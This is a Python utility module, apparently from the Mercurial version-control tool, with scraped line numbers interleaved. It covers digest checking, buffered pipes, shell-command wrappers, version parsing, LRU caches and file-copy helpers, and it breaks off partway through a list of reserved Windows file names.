    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
207
207
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue an python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.
    """
    if not _dowarn:
        return
    msg += ("\n(compatibility will be dropped after Mercurial-%s,"
            " update your code.)") % version
    warnings.warn(msg, DeprecationWarning, stacklevel + 1)
217
217
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        # digests: iterable of names from DIGESTS; s: optional initial data
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` into every requested digest."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest computed so far for digest type ``key``."""
        if key not in DIGESTS:
            # fix: format 'key' here - the old code formatted the stale
            # module-level loop variable 'k', always naming the wrong digest
            raise Abort(_('unknown digest type: %s') % key)
        return self._hashes[key].hexdigest()

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

    d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0  # number of bytes read so far
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, folding content into the digests."""
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        """Raise Abort unless size and every expected digest match."""
        if self._size != self._got:
            raise Abort(_('size mismatch: expected %d, got %d') %
                        (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise Abort(_('%s mismatch: expected %s, got %s') %
                            (k, v, self._digester[k]))
307
307
try:
    # Python 2: the builtin buffer type exists; re-export it unchanged.
    buffer = buffer
except NameError:
    # Python 3 removed the buffer builtin; emulate the same call signature
    # with zero-copy memoryview slices.
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]
315
315
# Whether subprocess.Popen calls below should close inherited file
# descriptors in the child; only requested on POSIX platforms.
closefds = pycompat.isposix
317
317
# number of bytes requested per os.read() in bufferedinputpipe._fillbuffer
_chunksize = 4096
319
319
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input
        self._buffer = []   # pending chunks, newest appended last
        self._eof = False   # set once os.read() returns no data
        self._lenbuf = 0    # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # keep filling until we have 'size' bytes or the pipe hits EOF
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        # read more chunks until a newline shows up or EOF is reached
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks into one before slicing
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)
413
413
def mmapread(fp):
    """Return a read-only mmap covering the whole content of fp.

    fp may be a file object (anything with fileno()) or a raw file
    descriptor. Empty files cannot be mmapped, so an empty buffer is
    returned for them instead of raising.
    """
    try:
        if hasattr(fp, 'fileno'):
            fd = fp.fileno()
        else:
            fd = fp
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise
424
424
def popen2(cmd, env=None, newlines=False):
    """Run cmd through a shell and return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd, shell=True, bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
435
435
def popen3(cmd, env=None, newlines=False):
    """Like popen4, but only return the (stdin, stdout, stderr) pipes."""
    # drop the trailing Popen object from popen4's 4-tuple
    return popen4(cmd, env, newlines)[:3]
439
439
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Run cmd through a shell; return (stdin, stdout, stderr, Popen)."""
    proc = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
448
448
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # the generated __version__ module is absent in some setups
        return 'unknown'
    return __version__.version
456
456
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # split off the extra part at the first '+' or '-'; the pattern must be
    # a raw string: '\+' in a plain string is an invalid escape sequence
    # (DeprecationWarning since Python 3.6, an error in 3.12)
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # stop at the first non-numeric component (e.g. 'rc')
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
525
525
# used by parsedate
# Each entry is a strptime()-style format string; formats are tried in order.
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    #   without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     #   without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    #   without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     #   without seconds
    '%Y-%m-%d %I:%M:%S%p',
    '%Y-%m-%d %H:%M',
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S',  #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

# Additional, more permissive formats (year/month only) used when an
# extended date range is acceptable.
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
)
567
567
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # a one-element list doubles as the "computed yet?" flag
        results = []
        def f():
            if not results:
                results.append(func())
            return results[0]
        return f
    results = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            try:
                return results[arg]
            except KeyError:
                results[arg] = func(arg)
                return results[arg]
    else:
        def f(*args):
            try:
                return results[args]
            except KeyError:
                results[args] = func(*args)
                return results[args]

    return f
593
593
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        pending = getattr(self, '_copied', 0)
        if pending:
            # someone shares us: hand back a private copy instead
            self._copied = pending - 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self
611
611
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # deleting first moves a re-set key to the end (last-set order)
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
636
636
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
    # no body needed: copy()/preparewrite() come from cow, storage from dict
662
662
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
    # no body needed: copy()/preparewrite() come from cow, order from sortdict
668
668
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            # commit only on a clean exit; release() always runs and aborts
            # an unclosed transaction
            if exc_type is None:
                self.close()
        finally:
            self.release()
693
693
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        # keep the work done so far, then re-raise for the caller to handle
        tr.close()
        raise
    finally:
        tr.release()
711
711
@contextlib.contextmanager
def nullcontextmanager():
    """A context manager that does nothing on enter or exit."""
    yield
715
715
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        self.next = None
        self.prev = None

        # _notset marks an allocated node that holds no entry
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
734
734
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        self._cache = {}

        # single self-linked node; more are added lazily up to 'max'
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # a read refreshes the entry's recency
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # unlike __getitem__, this does NOT refresh the entry's recency
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # empty every occupied node; the linked list itself is kept
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
893
893
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    maxsize = 20
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg in cache:
                # refresh recency of the cached entry
                order.remove(arg)
            else:
                if len(cache) > maxsize:
                    # evict the least recently used entry
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > maxsize:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
920
920
class propertycache(object):
    """Descriptor turning a method into a lazily computed, cached attribute.

    The first access runs the wrapped function and stores the result in the
    instance __dict__ under the function's name, so subsequent lookups hit
    the instance attribute and never reach the descriptor again.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
933
933
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    out, err = proc.communicate(s)
    # stderr is not captured; only the child's stdout is returned
    return out
940
940
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname = outname = None
    try:
        # write the input into a temp file for the command to read
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        # reserve an output file name; the command itself writes it
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temp files
        for name in (inname, outname):
            try:
                if name:
                    os.unlink(name)
            except OSError:
                pass
974
974
# Map a command prefix to the filter strategy used to run it.
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}
979
979
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # NOTE: shadows the builtin filter() within this module.
    for prefix, fn in filtertable.iteritems():
        if cmd.startswith(prefix):
            return fn(s, cmd[len(prefix):].lstrip())
    # no recognized prefix: default to the pipe strategy
    return pipefilter(s, cmd)
986
986
def binary(s):
    """return true if a string is binary data"""
    # an embedded NUL byte is the traditional binary-content heuristic;
    # empty or None input is reported as not binary
    return bool(s) and '\0' in s
990
990
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen < min:
            continue
        if min < max:
            # double the target, but jump straight to the largest
            # power of two not exceeding what we actually buffered,
            # capped at max
            min <<= 1
            nmin = 1 << log2(blen)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(buf)
        blen = 0
        buf = []
    # flush whatever is left, even if below min
    if buf:
        yield ''.join(buf)
1021
1021
# Historical alias: util.Abort is the same exception class as error.Abort.
Abort = error.Abort
1023
1023
def always(fn):
    """matcher helper that accepts every file name"""
    return True
1026
1026
def never(fn):
    """matcher helper that rejects every file name"""
    return False
1029
1029
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7. But it still affect
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        # remember the collector state so exceptional exits restore
        # exactly what the caller had
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if wasenabled:
                gc.enable()
    return wrapper
1052
1052
if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
1056
1056
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives: no relative path is possible
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    fromparts = splitpath(n1)
    toparts = n2.split('/')
    # strip the common leading components of both paths
    fromparts.reverse()
    toparts.reverse()
    while fromparts and toparts and fromparts[-1] == toparts[-1]:
        fromparts.pop()
        toparts.pop()
    toparts.reverse()
    # climb out of what remains of n1, then descend into n2
    return pycompat.ossep.join(['..'] * len(fromparts) + toparts) or '.'
1082
1082
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    # probe the markers each freezing tool leaves behind, in order
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1092
1092
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)
1101
1101
# cached path of the 'hg' executable; resolved lazily by hgexecutable()
_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # explicit override via the environment wins
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # running directly from the 'hg' script
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # last resort: search PATH, then fall back to argv[0]
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1127
1127
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path
1132
1132
1133 def _isstdout(f):
1133 def _isstdout(f):
1134 fileno = getattr(f, 'fileno', None)
1134 fileno = getattr(f, 'fileno', None)
1135 return fileno and fileno() == sys.__stdout__.fileno()
1135 return fileno and fileno() == sys.__stdout__.fileno()
1136
1136
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # booleans/None become '1'/'0' so shell tests work as expected
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return str(val)

    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    env['HG'] = hgexecutable()
    return env
1151
1151
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # the child can inherit our stdout/stderr directly
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture combined stdout+stderr and stream it into 'out'
        p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT)
        for line in iter(p.stdout.readline, ''):
            out.write(line)
        p.wait()
        rc = p.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc
1178
1178
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # only translate the TypeError when it was raised by the
            # call itself (traceback depth 1), not by code inside func
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1190
1190
1191 # a whilelist of known filesystems where hardlink works reliably
1191 # a whilelist of known filesystems where hardlink works reliably
1192 _hardlinkfswhitelist = {
1192 _hardlinkfswhitelist = {
1193 'btrfs',
1193 'btrfs',
1194 'ext2',
1194 'ext2',
1195 'ext3',
1195 'ext3',
1196 'ext4',
1196 'ext4',
1197 'hfs',
1197 'hfs',
1198 'jfs',
1198 'jfs',
1199 'reiserfs',
1199 'reiserfs',
1200 'tmpfs',
1200 'tmpfs',
1201 'ufs',
1201 'ufs',
1202 'xfs',
1202 'xfs',
1203 'zfs',
1203 'zfs',
1204 }
1204 }
1205
1205
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the old stat to detect mtime ambiguity below
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
        os.symlink(os.readlink(src), dest)
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1257
1257
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # auto-detect: only try hardlinking within a single device
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # offset child progress by files already copied here
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # once linking fails, stop trying for the whole tree
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1297
1297
1298 _winreservednames = {
1298 _winreservednames = {
1299 'con', 'prn', 'aux', 'nul',
1299 'con', 'prn', 'aux', 'nul',
1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1300 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1301 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
